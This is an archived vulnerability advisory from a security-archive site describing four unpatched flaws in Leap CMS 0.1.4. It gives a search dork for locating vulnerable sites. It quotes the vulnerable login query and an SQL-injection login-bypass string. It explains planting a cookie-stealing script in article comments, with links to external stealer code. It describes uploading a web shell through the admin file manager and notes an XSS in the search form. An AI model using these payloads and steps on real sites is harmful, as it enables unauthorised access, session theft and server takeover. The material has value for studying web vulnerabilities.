Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: CMS / Portals :: va3324.htm

Leap CMS 0.1.4 multiple remote vulns



MULTIPLE REMOTE VULNERABILITIES--Leap CMS 0.1.4-->
MULTIPLE REMOTE VULNERABILITIES--Leap CMS 0.1.4-->



--------------------------------------------------------=0D
MULTIPLE REMOTE VULNERABILITIES--Leap CMS 0.1.4-->=0D
--------------------------------------------------------=0D
=0D
  CMS INFORMATION:=0D
=0D
-->WEB: http://leap.gowondesigns.com/=0D 
-->DEMO: http://php.opensourcecms.com/scripts/details.php?scriptid=161&name=Leap=0D 
-->CATEGORY: CMS / Lite=0D
-->DESCRIPTION: Leap is a single file, template independent, open-source,=0D
		standards-compliant,extensible content management system for the web...=0D
-->RELEASED: 2009-03-13=0D
=0D
  CMS VULNERABILITY:=0D
=0D
-->TESTED ON: firefox 3 and I-Explorer 6=0D
-->DORK: "Powered by Leap"=0D
-->CATEGORY: AUTH-BYPASS(SQLi)/COOKIE-STEALER (XSS)/SHELL-UPLOAD/ XSS=0D
-->AFFECT VERSION: 0.1.4 (maybe <= ?)=0D
-->Discovered Bug date: 2009-04-24=0D
-->Reported Bug date: 2009-04-24=0D
-->Fixed bug date: Not fixed	=0D
-->Info patch: Not fixed=0D
-->Author: YEnH4ckEr=0D
-->mail: y3nh4ck3r[at]gmail[dot]com=0D
-->WEB/BLOG: N/A=0D
-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.=0D
-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)=0D
=0D
=0D
##############################=0D
//////////////////////////////=0D
=0D
AUTHENTICATION BYPASS (SQLi):=0D
=0D
/////////////////////////////=0D
##############################=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>=0D
=0D
=0D
-----------=0D
FILE VULN:=0D
-----------=0D
=0D
=0D
Path --> [HOME_PATH]/leap.php=0D
=0D
=0D
function checkSession() {=0D
=0D
	if($_POST['login']=='Login') { =0D
	=0D
		$_SESSION['userMail']=$_POST['email']; $_SESSION['passWord']=md5($_POST['pwd']); =0D
			=0D
		....=0D
	}=0D
	=0D
	$i=@mysql_query("SELECT * FROM ".db('prefix')."users WHERE mail='$_SESSION[userMail]' AND pwd='$_SESSION[passWord]'"); $d=@mysql_fetch_array($i);=0D
=0D
		....=0D
=0D
---------=0D
EXPLOIT:=0D
---------=0D
=0D
=0D
Email Address: nothing' or 1=1#=0D
=0D
Password: nothing=0D
=0D
=0D
#############################=0D
/////////////////////////////=0D
=0D
COOKIES STEALING VULN (XSS):=0D
=0D
/////////////////////////////=0D
#############################=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: Add comment +++++++++++++++++--------->>>>=0D
=0D
=0D
---------=0D
EXPLOIT:=0D
---------=0D
=0D
=0D
Go to Link --> http://[HOST]/[HOME_PATH]/?article.[ARTICLE_TITLE]=0D 
=0D
There it can comment the article.=0D
=0D
=0D
Add a comment with any name/email and message:=0D
=0D
=0D
=0D
=0D
=0D
PHP Script (Cookies Stealer) --> See: http://www.milw0rm.com/exploits/8453=0D 
http://www.milw0rm.com/exploits/8471=0D 
=0D
Note: Exploit fails if real admin click on log-out button.=0D
=0D
=0D
############################=0D
////////////////////////////=0D
=0D
SHELL UPLOAD VULNERABILITY:=0D
=0D
////////////////////////////=0D
############################=0D
=0D
=0D
<<<<---------++++++++++++++ Condition: Be superadmin (above) +++++++++++++++++--------->>>>=0D
=0D
=0D
---------=0D
EXPLOIT:=0D
---------=0D
=0D
=0D
Option: Manage Files. Link --> http://[HOST]/[HOME_PATH]/?admin.system.files=0D 
=0D
upload your shell there.=0D
=0D
Then, Go to the link --> http://[HOST]/[HOME_PATH]/shell.php=0D 
=0D
=0D
########################=0D
////////////////////////=0D
=0D
XSS (SEARCH POST FORM):=0D
=0D
////////////////////////=0D
########################=0D
=0D
=0D
Search:=0D
=0D
">=0D
=0D
=0D
#######################################################################=0D
#######################################################################=0D
##*******************************************************************##=0D
##            ESPECIAL GREETZ TO: Str0ke, JosS, Ulises2K ...         ##=0D
##*******************************************************************##=0D
##-------------------------------------------------------------------##=0D
##*******************************************************************##=0D
##              GREETZ TO: SPANISH H4ck3Rs community!                ##=0D
##*******************************************************************##=0D
#######################################################################=0D
#######################################################################


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH